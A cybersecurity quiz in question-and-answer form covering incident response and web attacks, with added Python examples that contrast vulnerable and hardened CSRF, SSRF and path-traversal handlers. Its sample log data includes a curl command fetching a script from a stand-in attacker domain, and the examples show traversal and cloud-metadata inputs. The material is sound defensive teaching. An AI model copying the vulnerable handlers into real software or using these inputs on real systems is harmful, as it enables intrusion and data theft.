This discussion-based exercise walks the response team through a simulated incident scenario, step by step, to test the incident response plan without touching production systems.
What is a tabletop exercise?
This phase of the Cyber Kill Chain is where the delivered payload triggers a vulnerability, giving the attacker initial code execution on the target.
What is the exploitation phase?
This type of attack forces an end user to execute unwanted actions on a web application in which they are authenticated.
What is CSRF (Cross-Site Request Forgery)?
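An added example, not part of the original page: a vulnerable transfer handler that trusts the session cookie alone, beside a hardened one that also demands a per-session token the attacker's page cannot read. The server secret, the handler names and the request dictionaries are assumptions made for this illustration.

```python
import hashlib
import hmac

# Hypothetical server-side secret (an assumption for this example); load it
# from configuration in a real deployment.
SERVER_SECRET = b"example-secret-do-not-use-in-production"


def issue_csrf_token(session_id: str) -> str:
    """Derive a per-session CSRF token (HMAC over the session id) that the
    server embeds in its own forms. A cross-origin page cannot read it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request: dict, session_id: str) -> str:
    """Vulnerable handler: it trusts the session cookie alone. The browser
    attaches that cookie to a cross-site form post too, so a forged request
    made by the victim's browser is honoured."""
    if not session_id:
        return "rejected: not authenticated"
    return f"transferred {request['amount']} to {request['to']}"


def transfer_hardened(request: dict, session_id: str) -> str:
    """Hardened handler: the request must also carry the token bound to this
    session. A forged cross-site request cannot include it."""
    if not session_id:
        return "rejected: not authenticated"
    expected = issue_csrf_token(session_id)
    supplied = str(request.get("csrf_token", ""))
    # Constant-time comparison so a timing side channel cannot reveal the token.
    if not hmac.compare_digest(expected, supplied):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {request['amount']} to {request['to']}"


# Constructed scenario: the victim is logged in; an attacker-controlled page
# auto-submits a form to the transfer endpoint.
VICTIM_SESSION = "sess-0123456789abcdef"
FORGED_REQUEST = {"amount": "1000", "to": "attacker"}   # attacker has no token
LEGIT_REQUEST = {"amount": "10", "to": "landlord",
                 "csrf_token": issue_csrf_token(VICTIM_SESSION)}

if __name__ == "__main__":
    print(transfer_vulnerable(FORGED_REQUEST, VICTIM_SESSION))  # honoured: the bug
    print(transfer_hardened(FORGED_REQUEST, VICTIM_SESSION))    # rejected
    print(transfer_hardened(LEGIT_REQUEST, VICTIM_SESSION))     # honoured
```

The HMAC-derived token is a simplification of a server-stored random token; in production, pair it with SameSite cookie attributes and reject state-changing GET requests as well.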
This term describes how an adversary behaves: the high-level goals they pursue, the methods and tools they use to reach them, and the specific steps they follow.
What are TTPs (Tactics, Techniques, and Procedures)?
This process ensures that evidence is collected, preserved, and documented in a manner that maintains its integrity.
What is chain of custody?
These predefined procedures guide the response to specific types of incidents.
What are playbooks?
This phase of the Cyber Kill Chain involves the attacker installing a backdoor or implant on the target system so that access survives reboots and credential changes.
What is the installation phase? (Persistence is the equivalent MITRE ATT&CK tactic; the Cyber Kill Chain has no phase by that name.)
These artifacts indicate a potential intrusion and are used to detect malicious activity.
What are Indicators of Compromise (IoCs)?
This process verifies that data has not been altered or tampered with, typically by comparing a cryptographic hash of the data against the hash recorded when it was collected.
What is validating data integrity?
This legal process requires organizations to preserve relevant information for potential litigation.
What is a legal hold?
This analysis identifies the underlying cause of an incident to prevent future occurrences.
What is root cause analysis? It belongs to the post-incident (lessons learned) phase, which prepares the organization for future incidents.
In the Diamond Model, this feature represents the tools and techniques used by the adversary to conduct an attack.
What is capability?
This step involves determining the extent of an incident and its impact on the organization.
What is scoping?
This step involves removing malicious components (malware, backdoors, rogue accounts) from affected systems.
What is eradication? (Often called remediation; NIST SP 800-61 uses eradication for this phase of the incident response lifecycle.)
This type of system collects and correlates security event data from many sources to provide near-real-time analysis of security alerts.
What is a Security Information and Event Management (SIEM) system?
These plans ensure that critical business functions can continue during and after a disaster.
What are business continuity (BC) and disaster recovery (DR) plans?
In the Diamond Model, this feature represents the infrastructure used by the adversary to deliver the capability to the victim.
What is infrastructure?
This type of attack tricks a server into fetching a resource on behalf of the attacker, often an internal service or cloud metadata endpoint the attacker cannot reach directly.
What is SSRF (Server-Side Request Forgery)?
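An added example, not part of the original page: a fetch function that hands any user-supplied URL to the HTTP client, beside a validator that only allows http(s) targets resolving to globally routable addresses. The DNS lookup is replaced by a constructed table (an assumption so the example runs offline); a real implementation would resolve with socket.getaddrinfo and connect to the pinned address it checked, to defeat DNS rebinding.

```python
import ipaddress
from urllib.parse import urlparse

# Constructed stand-in for DNS (assumption for this example, not real records).
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],       # globally routable
    "metadata.internal": ["169.254.169.254"],   # cloud metadata, link-local
    "localtest.example": ["127.0.0.1"],         # resolves to loopback
}

ALLOWED_SCHEMES = {"http", "https"}


def fetch_target_vulnerable(url: str) -> str:
    """Vulnerable: whatever the user supplies is fetched by the server."""
    return f"GET {url}"


def is_safe_target(url: str, resolve=None) -> bool:
    """Hardened check: only http(s); the host (IP literal or resolved name)
    must be globally routable. Loopback, private, link-local (169.254.0.0/16,
    where cloud metadata lives) and other special-purpose ranges are rejected,
    and an unresolvable name fails closed. `resolve` is injectable for tests."""
    resolve = resolve or (lambda host: FAKE_DNS.get(host, []))
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname
    try:
        addrs = [ipaddress.ip_address(host)]          # IP literal
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        return False
    return all(a.is_global for a in addrs)


def fetch_target_hardened(url: str) -> str:
    if not is_safe_target(url):
        return "rejected: target not allowed"
    return f"GET {url}"


if __name__ == "__main__":
    for u in ["http://169.254.169.254/latest/meta-data/",
              "http://metadata.internal/", "https://api.example.com/v1"]:
        print(fetch_target_vulnerable(u), "|", fetch_target_hardened(u))
```

Checking the resolved address rather than the hostname string is what blocks the "friendly name that resolves to 127.0.0.1" trick; checking both the literal and resolved forms closes the IP-literal bypasses (decimal, IPv6, bracketed).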
This control detects tampering by recording a baseline hash of monitored files and reporting any file that changes, appears, or disappears.
What is FIM (File Integrity Monitoring)?
This process involves collecting and processing log data from various sources to provide insights into system and network activities.
What is log ingestion?
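An added example covering the IoC, SIEM and log-ingestion items together; it is not code from the original page. It parses constructed syslog-style lines into structured events (dropping lines that do not parse) and then sweeps the events for a constructed set of indicators (an IP, a domain, a file hash). The log lines, the indicator values and the regular expressions are assumptions made for this illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines in syslog style (not from any real system).
SAMPLE_LOGS = """\
Mar 12 10:01:02 web01 sshd[2211]: Accepted password for deploy from 198.51.100.7 port 51122 ssh2
Mar 12 10:01:09 web01 sudo: deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl http://evil-updates.example/x.sh
Mar 12 10:01:11 web01 dnsmasq[880]: query[A] evil-updates.example from 10.0.0.5
Mar 12 10:02:30 web01 sshd[2290]: Failed password for root from 203.0.113.45 port 40011 ssh2
this line is not syslog and should be skipped
Mar 12 10:03:00 db01 auditd[412]: hash=0123456789abcdef0123456789abcdef exe=/tmp/.x
"""

# Constructed indicator set (stand-in values, not real threat intelligence).
IOCS = {
    "ip": {"198.51.100.7"},
    "domain": {"evil-updates.example"},
    "md5": {"0123456789abcdef0123456789abcdef"},
}

SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[^:\[]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)


@dataclass
class Event:
    ts: str
    host: str
    proc: str
    msg: str


def ingest(raw: str) -> list:
    """Ingestion step: turn raw lines into structured events. Lines that do
    not match the format are dropped here; in production, count them, since
    a spike in unparseable lines is itself worth an alert."""
    events = []
    for line in raw.splitlines():
        m = SYSLOG_RE.match(line)
        if m:
            events.append(Event(m["ts"], m["host"], m["proc"].strip(), m["msg"]))
    return events


def match_iocs(events: list, iocs: dict) -> list:
    """Detection step: extract candidate values from each message and keep
    those present in the indicator set. One hit per (event, indicator)."""
    hits = []
    for e in events:
        found = set()
        found |= {("ip", v) for v in IPV4_RE.findall(e.msg) if v in iocs["ip"]}
        found |= {("domain", v.lower()) for v in DOMAIN_RE.findall(e.msg)
                  if v.lower() in iocs["domain"]}
        found |= {("md5", v.lower()) for v in MD5_RE.findall(e.msg)
                  if v.lower() in iocs["md5"]}
        for kind, value in sorted(found):
            hits.append({"host": e.host, "ts": e.ts, "proc": e.proc,
                         "ioc_type": kind, "ioc": value})
    return hits


if __name__ == "__main__":
    for hit in match_iocs(ingest(SAMPLE_LOGS), IOCS):
        print(hit)
```

Note that the `sudo` line and the `dnsmasq` line both hit the same domain indicator: the shell command shows intent, the DNS query confirms execution. Correlating the two by host and time window is the kind of rule a SIEM adds on top of plain indicator matching.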
This guide provides a framework for testing the security of web applications.
What is the OWASP Testing Guide?
This model uses four core features—adversary, capability, infrastructure, and victim—to analyze cyber intrusions.
What is the Diamond Model of Intrusion Analysis?
This type of attack allows an attacker to execute arbitrary code on a remote machine.
What is RCE (Remote Code Execution)?
This type of attack abuses a web application that builds a file path from user input, letting the attacker read or include files already present on the server (for example, ../../etc/passwd).
What is LFI (Local File Inclusion)?
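An added example, not part of the original page: a page loader that joins the user-supplied name straight onto the document root, beside a hardened version that canonicalises the path and refuses anything outside that root. The document-root layout, the secret file and the function names are constructed for this illustration.

```python
import tempfile
from pathlib import Path


def read_page_vulnerable(base: Path, page: str) -> str:
    """Vulnerable: the user-controlled name is joined straight onto the base
    directory. '../' segments walk out of it, and an absolute path replaces it."""
    return (base / page).read_text()


def read_page_hardened(base: Path, page: str) -> str:
    """Hardened: canonicalise both paths (following symlinks) and insist the
    target is a regular file strictly inside the base directory."""
    base = base.resolve()
    try:
        target = (base / page).resolve()
    except (ValueError, OSError):              # e.g. an embedded NUL byte
        raise PermissionError("invalid page name")
    if target == base or not target.is_relative_to(base):
        raise PermissionError("page outside document root")
    if not target.is_file():
        raise FileNotFoundError(page)
    return target.read_text()


def run_demo() -> dict:
    """Constructed scenario: a 'pages' document root with a secret one level up."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        pages = root / "pages"
        pages.mkdir()
        (pages / "home.html").write_text("<h1>home</h1>")
        (root / "secret.txt").write_text("db_password=hunter2")

        leaked = read_page_vulnerable(pages, "../secret.txt")   # traversal succeeds
        try:
            read_page_hardened(pages, "../secret.txt")
            blocked = False
        except PermissionError:
            blocked = True
        return {"leaked": leaked, "blocked": blocked,
                "normal": read_page_hardened(pages, "home.html")}


if __name__ == "__main__":
    print(run_demo())
```

Resolving before the containment check matters: a symlink inside the document root that points outside it passes a purely string-based "does it start with ../" filter but fails this one. An allow-list of page names is stronger still where the set of pages is known.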
This logging level captures detailed information, including debugging messages, and is typically used during development.
What is debug level logging?